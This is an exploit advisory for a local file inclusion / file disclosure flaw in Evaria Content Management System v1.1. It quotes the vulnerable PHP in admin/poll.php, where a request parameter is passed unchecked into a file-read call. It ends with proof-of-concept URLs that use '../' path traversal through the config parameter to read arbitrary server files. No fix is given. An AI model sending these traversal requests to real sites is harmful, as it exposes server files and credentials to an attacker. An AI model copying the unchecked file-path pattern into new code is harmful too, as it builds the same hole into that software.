# Exploit Title: local file include / File Disclosure # Date: # Author: khayeye shotor # Software Link: http://www.evaria.com/en/?view=download&dload=1 # Version: Evaria Content Management System v.1.1 # Thanks: khayeye sag , kandome mivei , sinehaye amam and all amehaye irani ----------- vul code: /path/admin/poll.php $file_contents = file("admin/".$current_poll); if (((isset($vote_logging))) && (($vote_logging == 1) || ($vote_logging == 3))) { foreach ($file_contents as $line) { if (eregi($REMOTE_ADDR, $line)) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $already_voted . "
\n"; $set_already_voted = 1; $vote_allow = 0; break; } } } if (((isset($vote_logging))) && (($vote_logging == 2) || ($vote_logging == 3))) { if ((isset($voted)) && ($voted == "on")) { if (!$set_already_voted) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $already_voted . "
\n"; } $vote_allow = 0; break; } } if ($vote_allow) { $poll_string = $vote . "|" . $REMOTE_ADDR . "\n"; $fp = fopen("admin/".$current_poll, "a"); $string_size = strlen($poll_string); if (fputs($fp, $poll_string, $string_size)) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $vote_cast . "
\n"; } fclose($fp); } } break; case "default": display_form(); break; } } // Display poll form if no view is called upon... if (!isset($mode)) { display_form(); } elseif ((isset($vote) == 0) && (isset($mode))) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $no_selection . "
\n"; } function display_form() { global $config; global $no_voting; global $QUERY_STRING; echo "
\n"; echo "\n"; echo " \n"; $answers = file("admin/".$config); ------------------------------------------------ poc: /admin/poll.php?config=../../eprint.php /admin/poll.php?config=[local file]